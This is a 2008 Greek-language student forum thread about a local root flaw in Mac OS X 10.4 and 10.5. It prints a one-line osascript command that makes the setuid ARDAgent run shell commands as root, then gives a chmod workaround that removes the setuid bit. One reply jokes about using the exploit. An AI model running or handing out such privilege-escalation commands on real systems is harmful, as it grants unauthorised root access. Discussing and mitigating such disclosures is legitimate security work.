Venus AUEB Forum

Online κοινότητα των φοιτητών Πληροφορικής του Ο.Π.Α.
https://venus.cs.aueb.gr/

Macos X 10.4 & 10.5 Local r00t

https://venus.cs.aueb.gr/viewtopic.php?f=46&t=6110

Page 1 of 1

Macos X 10.4 & 10.5 Local r00t

Posted: Thu Jun 19, 2008 4:07 pm
by ablaz3r
Αυτή την φορά η apple ξεπέρασε και την Microsoft:

Code: Select all

shadow:~ nick$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root
http://it.slashdot.org/article.pl?sid=0 ... 4&from=rss

Πρόχειρη λύση μέχρι να βγεί patch, βγάλτε το suid flag από το ARDAgent. :smt013

Re: Macos X 10.4 & 10.5 Local r00t

Posted: Thu Jun 19, 2008 4:10 pm
by ablaz3r

Code: Select all

chmod -s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
updated:
Μάλλον παίζει το exploit σε οποιοδήποτε scriptable suid binary... :smt021

Re: Macos X 10.4 & 10.5 Local r00t

Posted: Fri Jun 20, 2008 1:12 am
by HdkiLLeR
Δώστε SUID στον λαό για να παίζουμε και με κανένα mac box :) :) :)
All times are UTC+03:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited